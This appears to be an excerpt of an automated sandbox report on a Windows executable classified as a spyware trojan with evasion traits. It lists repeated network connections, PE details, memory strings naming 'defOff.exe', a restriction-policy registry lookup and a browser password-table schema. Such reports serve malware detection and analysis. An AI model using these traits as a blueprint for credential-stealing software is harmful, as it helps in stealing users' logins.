            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62139
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62010
            Source: unknownNetwork traffic detected: HTTP traffic on port 62129 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62131
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62011
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62133
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62135
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62136
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62016
            Source: unknownNetwork traffic detected: HTTP traffic on port 62075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62137
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62017
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62138
            Source: unknownNetwork traffic detected: HTTP traffic on port 62052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62150
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62030
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62151
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62031
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62152
            Source: unknownNetwork traffic detected: HTTP traffic on port 61989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62029
            Source: unknownNetwork traffic detected: HTTP traffic on port 62041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62021
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62143
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62023
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62145
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62146
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62026
            Source: unknownNetwork traffic detected: HTTP traffic on port 62097 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62147
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62149
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62123 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62100 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62134 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62060 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62141 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62111 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 61991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.5.155:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49804 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:61970 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62095 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62115 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62114 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62116 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62117 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:62118 version: TLS 1.2

            System Summary

            barindex
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D7CAC40_3_00D7CAC4
            Source: file.exeBinary or memory string: OriginalFilename vs file.exe
            Source: file.exe, 00000000.00000003.2235965603.0000000005ABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2234266706.0000000005942000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2265417496.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2346557356.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236038931.0000000005C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2239486173.0000000005D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240227543.0000000005D37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243904454.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2247427841.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238072374.0000000005C57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2234266706.00000000058F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241433083.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2242890982.0000000005C61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236622403.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000002.2395678480.00000000061CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2245396042.0000000005EA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243430622.0000000005D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240750944.0000000005D4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2234266706.00000000058B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237041467.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237461179.0000000005D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2242176569.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2239595219.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243233974.0000000005D6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2239353212.0000000005C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240919498.0000000005C57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236245983.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2245647998.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238740777.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2242655803.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2265324083.0000000005800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2265674333.0000000005861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2239917524.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2246220324.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2239228436.0000000005D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237885169.0000000005D04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2244593609.0000000005D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237139418.0000000005CF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241739731.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2242779456.0000000005D70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238980403.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2244291624.0000000005D80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2246768770.0000000005D94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243782666.0000000005E83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2244414680.0000000005C56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240325982.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2239810836.0000000005D33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243344427.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2244027532.0000000005D78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241232235.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236535273.0000000005CF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236172083.0000000005C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237335787.0000000005C5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238473451.0000000005DDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240117993.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2247744362.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237241831.0000000005DB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2265286736.00000000058B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2246635667.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241088521.0000000005D4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237788220.0000000005C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2247040303.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2245857324.0000000005D83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241536707.0000000005D50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241926974.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237693029.0000000005D08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236957736.0000000005DA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236112962.0000000005AB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238260741.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2247540875.0000000005D9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2246905044.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240427749.0000000005C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2246505997.0000000005EBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2245192562.0000000005D7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2242286956.0000000005D54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2235864296.0000000005942000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2244944987.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2247178520.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238593009.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243662729.0000000005D69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241820060.0000000005D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2248955057.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000002.2395212908.0000000005D56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2248078250.0000000005EE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2244151953.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240014501.0000000005D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240633705.0000000005C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241330735.0000000005D45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236881835.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000002.2394785291.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2244770841.0000000005EB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236457996.0000000005C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2247938259.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2246359999.0000000005D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237976776.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2242033788.0000000005D5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2240528920.0000000005D50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2248365290.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236719589.0000000005D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2247283470.0000000005D99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2265417496.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238164171.0000000005D1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236307057.0000000005C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236799504.0000000005C57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243545596.0000000005C52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243121894.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2237596881.0000000005C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2243008073.0000000005D70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2242393534.0000000005E5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2241638635.0000000005E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2239702536.0000000005C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2238363282.0000000005D14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2236382344.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/70@16/10
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.2048505280.00000000057C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2048292741.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2061912936.00000000057C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeReversingLabs: Detection: 39%
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: file.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
